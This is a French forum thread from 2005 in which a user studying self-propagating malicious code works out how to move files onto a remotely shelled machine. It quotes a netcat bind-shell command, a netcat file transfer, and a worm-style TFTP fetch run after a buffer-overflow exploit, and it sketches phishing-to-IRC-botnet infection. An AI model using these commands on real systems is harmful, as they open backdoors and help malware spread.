Salut voila j'explique le probleme.

Configuration deux machines tournant sous XP Pro SP1.
Les deux bécanes sont distantes et sont connecté à internet.
on va dire que Machine A : 87.65.43.21 et Machine B : 12.34.56.78
Sur la A , un shell est ouvert sur le port 25 en permanence et sans aucun controle d'identité.(on mets de coté la securité et le piratage possible, la machine A n'a aucune données importantes , c'est pas genant si quelqu'un trouve le shell et s'y connecte.)

Maintenant sur la becane B je fait , Executer > cmd

B > telnet 87.65.43.21 25
bla bla bla
A >

Voila je suis connecté à A et j'ai acces au shell avec les droits de l'users en cours( ici administrateur)
La question que je me pose c'est comment envoyer un fichier de la machine B vers la machine A en passant par le shell ???

ce qui me vient tout de suite à l'esprit : A a un serveur ftp, et hop ! sinon, doit y avoir d'autres solutions je pense...

Wé j'avais penser a ca mais le probleme c'est que j'ai pas le droit d'installer un serveur ftp sur la machine A

:/

Si tu as les droits admin sur la machine tu dois pouvoir installer ce que tu veux ..

Maintenant j'ai comme un doute sur le bien fonde de ton topic ..

Sur le port 25 habituellement c est le smtp qui tourne... je comprends pas : si tu as vraiment installe un telnet sur le port 25, c est probablement que ya qq chose qui va pas, ou alors c ets que tu te connecte vraiment sur un smp, mais qui n envois pas de banniere...

de toute facon, dans les 2 cas tu auras du mal a transferer des fichiers.

bon je me suis mal expliqué au debut d'ou le lock et le passage au purgatoire .
Ayé j'ai fini mon pelerinage je vais m'expliquer plus clairement.

Je fais une etude sur les CPA , les deux machines m'appartiennent , je m'interdis d'installer un serveur ftp sur la machine A mais la machine B a le tftp de windows. j'ai choisis le port 25 mais j'aurais pu prendre n'importe quel port. je bind le shell de cette maniere : nc -L -p [PORT] -d -e cmd.exe

le but du thread est de comprendre comment le CPA(ici c'est moi meme qui test de la machine B) apres s'etre connecté à la machine faillible (ici c'est mon deuxieme ordi machine A) arrive à s'envoyé (moi je test avec une image) à la machine distante(machine A) qui n'a pas de serveur ftp.

On va dire que c'est à la limite des règles du forum donc j'aimerais savoir si on lock definitivement ce topic ou on continue ?????

ok donc si je comprends bien tu as :

machine B distante : nc -L -p 25 -d -e cmd.exe
mahcine B : => nc disponible, tftp ausi

mahcine A locale : telnet B 25
machine A : pas de serveur ftp mais client tftp dispo

Et tu veux transferer un fichier de B vers A.

Tu pourrais preciser :
- machine A : nc disponible ? serveur tftp dispo ?
- mahcine B : serveur tftp dispo ? serveur ftp dispo ?

Sinon, tu peux faire :

machine A: nc -l -p 6666 > fichier
(-l est imortant)

machine B: type fichier | nc A 6666
(tu fait ensuite ctrl+c pour couper la communication qd le transfert est fini selon toi car la fin de fichier envoyee par type ne stoppe pas le socket cree par netcat)

Le 23 septembre 2005 - 19 h 01, kha a écrit : ok donc si je comprends bien tu as : machine B distante : nc -L -p 25 -d -e cmd.exe mahcine B : => nc disponible, tftp ausi mahcine A locale : telnet B 25 machine A : pas de serveur ftp mais client tftp dispo Et tu veux transferer un fichier de B vers A. Tu pourrais preciser : - machine A : nc disponible ? serveur tftp dispo ? - mahcine B : serveur tftp dispo ? serveur ftp dispo ?

en fait c'est plutot transferer un fichier de A vers B.

Machine A : Le CPA a installé netcat et tftp de disponible
Machine B : tftp et un acces au shell de disponible (netcat sert juste à simuler un shell obtenu par un exploit de type remote buffer overflow envoyer par Machine A).

Etape 1
Machine A : Telnet B 25 ------- connexion ------------> Machine B (shell sur le port 25 simuler par nc)

Etape 2 :
Machine A : Shell_B > ....

Etape 3 :
Machine A : Fichier ---------------- envoi -----------------> Machine B recoit le fichier.

Le 23 septembre 2005 - 17 h 23, lombredudragon a écrit : On va dire que c'est à la limite des règles du forum donc j'aimerais savoir si on lock definitivement ce topic ou on continue ?????

Moi j'attend de lire le résultat de cette expérience

Qu'entends-tu par CPA ??

Le 23 septembre 2005 - 20 h 10, cilo a écrit : Le 23 septembre 2005 - 17 h 23, lombredudragon a écrit : On va dire que c'est à la limite des règles du forum donc j'aimerais savoir si on lock definitivement ce topic ou on continue ????? Moi j'attend de lire le résultat de cette expérience

Au pire pendant l'experience sur ma becane quelqu'un trouve le shell et s'amuse sur mon disque
J'ai mon cd de reinstall pas loin


iraysyvalo > Definition de CPA : Code Parasite Autopropageable

je vois pas trop ou tu veux en venir.... si tu veux simuler un exploit, de toute facon il sera code de telle maniere qu il aura son propre systeme de transfert de fichier.

si tu veux refaire manuellement les etapes, ben sur b tu a la commande ftp qui te permet de te connecter sur un ftp de A que tu cree pour simuler le systeme de transfert d un CPA par eemple !

t as qu a coder et tu verras. je vois pas l interet de ton experience pasque si un code malicieux se trouve sur B de toute facon B est compromis et n importe quoi peut etre fait dessus, soit en utilisant des commandes systemes ou par programmation.

Le 24 septembre 2005 - 03 h 54, kha a écrit : t as qu a coder et tu verras. je vois pas l interet de ton experience pasque si un code malicieux se trouve sur B de toute facon B est compromis et n importe quoi peut etre fait dessus, soit en utilisant des commandes systemes ou par programmation.

Justement B n'a pas encore était toucher par le CPA, seule la machine A a le CPA present sur son disque.
Sur la B on a juste un Shell d'ouvert

EDIT : je crois que j'ai compris comment ca marche j'en ai mis du temps.

Etape 1 : Machine A : le CPA installe un serveur TFTP sur la machine
Etape 2 : Machine A ------------------- envoi de l'exploit ------------------ Machine B
Etape 3 : Machine A obtient un shell sur la machine B
Etape 4 : Machine A se connecte au shell de B et execute la commande : tftp -i [ip de A] GET A:/fichier



La parade pour eviter d'etre infecter par ce genre de CPA consisterait a bloquer le port de tftp avec le firewall ??


EDIT 2 : J'ai adapté un code source de serveur tftp linux pour windows et ca marche à merveille.
Le seul truc c'etait de savoir que ioctl() sous linux peut etre remplacer par ioctlsocket() sous windows.

a+ tlm

tu nous avait pas dit que sur la mahcine A tu pouvai faire un serveur tftp ! c est comme si t avait un ftp... mais si tu refuse un serv ftp sur A, pkoi tu mettrait un serv tftp...

Le 24 septembre 2005 - 16 h 25, kha a écrit : tu nous avait pas dit que sur la mahcine A tu pouvai faire un serveur tftp ! c est comme si t avait un ftp... mais si tu refuse un serv ftp sur A, pkoi tu mettrait un serv tftp...

C'est la seule solution que j'ai trouvé

Ton experience est vraiment biaisee !

Si tu as d'autre idée je suis preneur.
Pour le choix du tftp au lieu du ftp c'est tout simplement
que tftp est un protocole léger qui peut etre facilement embarqué dans un CPA.
FTP aussi mais je suis résolument contre car je connais deja un peu ce protocole et je souhaite apprendre autre chose.

ben la !

un gars qui active le port tftp : soit qu il a laise son pc ouvert, soit c est un cas particulier. si c est le premier cas, tu peux utiliser n importe quel port.

ca depend c est quoi le but du code aussi... si le code veut se propager plus facilement, le moyen a utiliser est le port 80, en general non filtre par les firewalls.

maintenant, de toute facon, si la premiere connexion se fait via un remote buffer overflow d un service (quand meme de plus en plus rare), de maniere generale tu pourra utiliser n importe quel port... maintenant, ce qui est bien plus dangereux ce sont les attaques par phising, qui servent a la fois a recuperes des infos personnelles et egalement peuvent servir a infecter les postes des client via des failles d un navigateur. une fois le code telecharge et execute, c est pas tres compliquer de coder un bot irc qui va se conecter sur un chan, modere par le pirate. Tres vite il va avoir a sa disposition une panoplie de bots controlables a distance et ayant la capacite d executer plusieurs types d attaques (denis de services, scans, sniffing, ...).

Ton exemple ne reflete pas trop un cas reel generique puisqu il s appuie sur des particularites pour fonctionner.

Le 27 septembre 2005 - 03 h 13, kha a écrit : Ton exemple ne reflete pas trop un cas reel generique puisqu il s appuie sur des particularites pour fonctionner.

Wé je sais car j'etudie justement un cas specifique des remote buffer overflow.
Et je cherches tout les cas possible pour infecter un poste en ayant un shell de dispo sur celui ci.
TFTP je connaissait vraiment vite fait car le ver nimda ou un autre utiliser une dll tftp dans son code.

C'est vrai qu'en ce moment les bot irc couplés aux failles navigateur marche plutot bien
Mais ca m'interresse moins